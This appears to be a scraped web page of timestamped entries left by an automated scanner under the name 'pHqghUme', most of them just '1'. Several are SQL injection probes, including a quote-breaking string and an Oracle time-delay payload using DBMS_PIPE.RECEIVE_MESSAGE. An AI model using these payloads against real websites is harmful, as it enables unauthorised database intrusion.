  2021-05-06 07:31:31


  1


 • pHqghUme

  2021-05-06 07:31:30


  1


 • pHqghUme

  2021-05-06 07:31:29


  1


 • pHqghUme

  2021-05-06 07:31:28


  1


 • pHqghUme

  2021-05-06 07:31:27


  1


 • pHqghUme

  2021-05-06 07:31:08


  1


 • pHqghUme

  2021-05-06 07:30:38


  1


 • pHqghUme

  2021-05-06 07:25:09


  1


 • pHqghUme

  2021-05-06 07:24:49


  1


 • pHqghUme

  2021-05-06 07:20:48


  1


 • pHqghUme

  2021-05-06 07:20:33


  1


 • pHqghUme

  2021-05-06 07:20:23


  1N9sITBaO


 • pHqghUme

  2021-05-06 07:20:22


  1


 • 1DnkS4GNO

  2021-05-06 07:20:22


  1


 • pHqghUme

  2021-05-06 07:20:21


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme

  2021-05-06 02:13:34


  @@Mawug


 • pHqghUme

  2021-05-06 02:13:30


  1'"


 • pHqghUme

  2021-05-06 02:13:28


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'